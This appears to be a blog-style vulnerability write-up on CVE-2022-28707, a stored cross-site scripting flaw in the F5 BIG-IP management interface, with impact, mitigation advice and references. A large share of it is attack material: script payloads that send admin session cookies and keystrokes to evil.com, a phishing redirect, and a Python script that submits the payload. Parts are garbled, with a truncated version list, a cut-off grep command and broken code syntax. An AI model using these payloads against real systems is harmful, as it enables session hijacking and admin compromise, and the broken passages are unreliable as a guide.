CVE-2022-28707 - Exploiting Stored XSS in F5 BIG-IP TMUI (With Code Samples & Analysis)

Summary:  
CVE-2022-28707 exposes a severe vulnerability in certain versions of the F5 BIG-IP system, affecting its web management interface, known as the Configuration Utility or TMUI. If left unpatched, this flaw allows attackers to inject persistent, malicious JavaScript code, creating real risks of privilege escalation, session hijacking, and more.

In this post, we’ll break down what this means, how the exploit works, share code snippets, reference the original advisories, and offer actionable recommendations.

What is CVE-2022-28707?

CVE-2022-28707 is a stored cross-site scripting (XSS) bug found in the Configuration utility of the F5 BIG-IP system. Stored XSS means the attacker’s script isn’t just injected in one visit (like reflected XSS), but is *saved in the application* and appears anytime users load affected pages — until removed.

14.1.x versions before 14.1.4.6

Note: Older, unsupported versions outside these ranges may also be at risk but are not evaluated or patched.

Official F5 Advisory:  
https://support.f5.com/csp/article/K46421519

How Does The Exploit Work?

The vulnerability lies in an *undisclosed page* of the TMUI (the web UI for system management). Attackers who are able to add crafted input (like setting a system name, note, or another property shown on the TMUI) can inject JavaScript code.

When any administrator or legitimate user views this value in the web UI after it has been tampered with, the browser will execute the attacker's script _with the privilege level of the user who’s viewing the page_.

Real-World Impact

- Session Theft: If an admin loads the malicious page, their session cookie or token can be stolen.

Let’s say the vulnerable input field is a configuration label/description. The attacker submits

<script>fetch('https://evil.com/steal?c='+document.cookie)</script>

Once an administrator logs into TMUI and views the page where this label appears, the code runs in the browser. The fetch makes a request to the attacker’s server, stealing the admin’s session cookie.

Attacker Submission Example

# Notional Python script to automate the attack (using requests)
import requests

# Replace these with actual values for target F5 BIG-IP TMUI
url = "https://bigip.example.com/tmui/vulnerable_endpoint";
session = requests.Session()
session.verify = False

# Authenticate first (if needed)
session.post(url="/tmui/login.jsp", data={"username":"attacker","password":"password"})

# Submit the malicious label/data
payload = '<script>fetch("https://evil.com/steal?c="+document.cookie)</script>'
data = {"label": payload}

resp = session.post(url, data=data)
print("Payload submitted. Check evil.com for cookies.")

What happens next?

When anyone with appropriate access views the affected page, the browser runs the script, sending the user’s cookie to evil.com.

`bash

grep -ri '

Use a Proxy Tool:

Tools like Burp Suite can be used to see raw responses when logged into TMUI, making it easier to spot script injections in output.

Exploit Details

- Attack Vector: Admin/authenticated user with the right privilege submits a crafted input.

User Interaction: Required (admin must load affected page).

- Privileges Required: Authenticated access (but privilege escalation is possible by capturing higher-privilege sessions).

1. Stealing Session Cookies

<script>
fetch('https://evil.com/steal?cookie='; + document.cookie)
</script>

2. Installing JavaScript Keyloggers

<script>
document.onkeypress = function(e){fetch('https://evil.com/log?k='+e.key)}
</script>

3. Redirecting the User

<script>window.location='https://evil.com/phish'</script>;

Use WAF Rules:

If patching isn’t immediately possible, use Web Application Firewall (WAF) rules to block or sanitize script input.

- Monitor for Suspicious Descriptions/Labels:

Review Logs:

Look for evidence of unexpected GET/POST requests or traffic to unknown domains.

More References

- F5 Security Advisory (K46421519)
- NVD Entry for CVE-2022-28707
- OWASP XSS Cheat Sheet

Conclusion

CVE-2022-28707 is a classic but dangerous stored XSS — targeting sysadmins and operators on F5 BIG-IP appliances. By injecting code that persists across sessions, an attacker only needs a single admin to load the booby-trapped page to compromise your critical network infrastructure.

Patch now, audit your devices, and monitor for suspicious activity. And remember, never trust input — especially on something as sensitive as TMUI.


*Stay secure, and always keep an eye out for seemingly small vulnerabilities like this — they often open the door to the largest risks in your network.*

Timeline

Published on: 05/05/2022 17:15:00 UTC
Last modified on: 05/12/2022 15:30:00 UTC